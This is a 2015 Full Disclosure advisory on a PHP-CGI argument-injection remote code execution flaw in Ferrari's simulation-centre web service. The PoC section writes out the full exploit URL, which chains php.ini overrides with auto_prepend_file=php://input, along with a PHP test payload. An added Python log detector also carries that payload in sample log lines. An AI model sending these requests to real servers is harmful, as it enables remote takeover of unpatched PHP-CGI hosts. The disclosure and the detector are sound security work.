
List:       full-disclosure
Subject:    [FD] Ferrari - PHP CGI Argument Injection (RCE) Vulnerability
From:       Vulnerability Lab <research () vulnerability-lab ! com>
Date:       2015-08-07 17:23:11
Message-ID: 55C4E97F.7020705 () vulnerability-lab ! com

Document Title:
===============
Ferrari - PHP CGI Argument Injection (RCE) Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1562

Video: http://www.vulnerability-lab.com/get_content.php?id=1561

Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2015/08/07/ferraricom-simulationcenter-remote-code-execution-php-cgi-argument-injection



Release Date:
=============
2015-08-07


Vulnerability Laboratory ID (VL-ID):
====================================
1562


Common Vulnerability Scoring System:
====================================
9.2


Product & Service Introduction:
===============================
Users can choose from one of five different circuits (Monza, Imola, Mugello, Silverstone and Nürburgring), while HD screens literally wrap 180 degrees around them, delivering ultra-realistic graphics to boot. The experience perfectly illustrates the concept of the new Ferrari Store, which was opened just two months ago and was conceived not merely as a shopping destination but also as an entertainment venue. With four F1 simulators, interactive video walls and numerous multisensory positions, the new 750 square meter space treats visitors to a completely immersive experience of the Ferrari legend.

(Copy of the Vendor Homepage http://auto.ferrari.com/en_EN/news-events/ )


Abstract Advisory Information:
==============================
An independent Vulnerability Laboratory researcher discovered a remote code execution vulnerability in the official Ferrari online service web-application.


Vulnerability Disclosure Timeline:
==================================
2015-08-07:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Ferrari
Product: Simulator - Online Service (Web-Application) 2015 Q3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. From the advisory: ``if there is NO unescaped `=` in the query string, the string is split on `+` (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the ``encoded in a system-defined manner`` from the RFC) and then passes them to the CGI binary.`` This module can also be used to exploit the plesk 0day disclosed by kingcope and exploited in the wild in June 2013. (Source: http://www.rapid7.com/db/modules/exploit/multi/http/php_cgi_arg_injection)
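The rule quoted above is also what a defender needs to detect this class of request: a query string with no literal `=` is handed to php-cgi as argv, so any `+`-separated token that decodes to a leading `-` is an injected interpreter option, and `-d` tokens carry the php.ini directives being set. The following Python detector is an added example (it is not code from the advisory, from Ferrari, or from the Rapid7 module) that reconstructs that argv from the raw query string and runs the check over access-log lines. The four log lines, the client addresses, and the regex for Apache's combined log format are constructed for this example.

```python
"""Detect PHP-CGI argument injection attempts in web-server access logs.

Mirrors the RFC 3875 rule quoted in the advisory: when a query string contains
no unescaped '=', the CGI gateway splits it on '+', URL-decodes each piece and
passes the pieces to the CGI binary as command-line arguments.  Any piece that
then starts with '-' is an injected php-cgi option; '-d' pieces carry ini
directives.  Note that the check must run on the RAW query: a percent-encoded
'%3D' does not count as '=', which is exactly why the PoC URL encodes it.
"""
import re
from urllib.parse import unquote, urlsplit

# Apache "combined" log format (constructed for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines: one PoC-style POST, two benign requests
# (the second is the legitimate ISINDEX-style "word+word" query that must
# NOT be flagged), and one GET that injects a single directive.
SAMPLE_LOG = [
    '203.0.113.5 - - [16/Jun/2015:09:16:13 +0000] "POST /cgi-bin/php?-d+allow_url_include%3Don'
    '+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-n HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [16/Jun/2015:09:17:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [16/Jun/2015:09:17:05 +0000] "GET /search.php?red+cars HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [16/Jun/2015:09:18:00 +0000] "GET /cgi-bin/php?-d+safe_mode%3Doff HTTP/1.1" 200 3000 "-" "curl/7.43"',
]


def cgi_argv(query):
    """Return the argv a CGI gateway derives from a raw query string, or []
    when the query is not treated as command-line arguments (it contains a
    literal, unescaped '=')."""
    if query == "" or "=" in query:
        return []
    return [unquote(part) for part in query.split("+") if part != ""]


def injected_directives(argv):
    """Return (options, directives): every argv entry beginning with '-' and
    the ini directives passed through -d, in both '-d name=val' and
    '-dname=val' spellings."""
    options, directives = [], []
    i = 0
    while i < len(argv):
        arg = argv[i]
        if arg.startswith("-"):
            options.append(arg)
            if arg == "-d" and i + 1 < len(argv):
                directives.append(argv[i + 1])
                i += 1  # the directive was consumed as the option's value
            elif arg.startswith("-d") and len(arg) > 2:
                directives.append(arg[2:])
        i += 1
    return options, directives


def analyse_request(target):
    """Classify one request target (path?query). Returns a finding dict when
    the query would reach php-cgi as options, else None."""
    parts = urlsplit(target)           # urlsplit keeps the query undecoded
    options, directives = injected_directives(cgi_argv(parts.query))
    if not options:
        return None
    return {"path": parts.path, "options": options, "directives": directives}


def scan_log(lines):
    """Run the check over access-log lines; return one finding per hit."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        finding = analyse_request(m.group("target"))
        if finding:
            finding.update(ip=m.group("ip"), ts=m.group("ts"), method=m.group("method"))
            hits.append(finding)
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["method"], hit["path"],
              "options:", hit["options"], "directives:", hit["directives"])
```

The detector deliberately keys on the structural property (no literal `=`, a decoded token starting with `-`) rather than on the specific directive names in the PoC, so variations in directive order or encoding still match, while an ordinary `word+word` search query passes untouched. The same two-step rule (raw query has no `=`, and some `+`-delimited token begins with `-` or `%2d`) is what a request filter in front of php-cgi should reject.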


Proof of Concept (PoC):
=======================
The remote code execution vulnerability can be exploited by remote attackers without a privileged application user account or user interaction. For security demonstration or to reproduce, follow the provided information and steps below.

How I found the vulnerability: As part of any penetration test, fingerprinting is one of the first steps. After sending a request to their servers, I noticed they used PHP/5.3.12, which is known to be vulnerable to a command execution vulnerability.

The Response: 
HTTP/1.1 302 Found
Date: Wed, 16 Jun 2015 09:16:13 GMT
Server: Apache
Location: /book/
X-Powered-By: PHP/5.3.12
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

I started testing for this vulnerability manually and noticed code execution could be performed when making a POST request to:

http://simulationcenter.ferrari.com/cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n


I noticed an error.
http://i.imgur.com/lFPgpyn.png

When sending some PHP script along with the POST request I noticed the script was executed. I sent this script: <?php echo(md5(kieran)); ?> and the right hash was returned.

I then did some automated testing with a metasploit script and this also gave positive results.

The exploit script can be found here: http://www.rapid7.com/db/modules/exploit/multi/http/php_cgi_arg_injection

The PoC with both manual and automated exploitation can be found here: https://www.youtube.com/watch?v=vv7SMWC08eI


Solution - Fix & Patch:
=======================
2015-08-05 (fixed by ferrari)


Security Risk:
==============
The security risk of the code execution web vulnerability in the Ferrari simulator online service is estimated as critical. (CVSS 9.2)


Credits & Authors:
==================
Kieran Claessens (www.kieranclaessens.be)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partial usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


